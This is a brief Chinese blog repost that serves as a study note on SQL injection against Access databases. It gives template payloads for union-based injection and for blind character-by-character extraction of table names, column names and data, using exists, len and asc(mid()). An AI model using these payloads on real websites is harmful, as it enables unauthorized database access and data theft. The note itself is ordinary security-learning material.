码迷,mamicode.com
首页 > 数据库 > 详细

sql注入--access

时间:2018-09-07 19:15:48      阅读:158      评论:0      收藏:0      [点我收藏+]

标签:字典   order   编码   bubuko   图片   其他   联合查询   sql注入   bsp   

access数据库结构:

  表名  -->  列名  -->  数据

access注入攻击片段

  联合查询法:

    (1)  判断注入点:  ?id=1 and 1=1 ; ?id=1 and 1=2

    (2)  猜解表长度:  ?id=1 order by 3

    (3)  猜解表名:  ?id=1 union select 1,2,3 from 表名 

    (4)  猜解列名:  ?id=1 union select  列名,2,3 from  表名

    (5)  猜解数据

  逐字猜解法:

    (1)  查表:?id=1 and exists (select * from 表名)

    (2)  查列:?id=1 and exists (select 列名 from 表名)

    (3)  查数据:1.确定长度

            ?id=1 and (select top 1 len(列名) from 表名)=5

          2.确定asc数据(asc编码)    

            ?id=1 and (select top 1 asc(mid(列名,位数,1)) from 表名)=97

  其他方法:

    (1)字典文件收集(社工)

    (2)Access偏移注入

 

 

技术分享图片

 

sql注入--access

标签:字典   order   编码   bubuko   图片   其他   联合查询   sql注入   bsp   

原文地址:https://www.cnblogs.com/China-Waukee/p/9606527.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!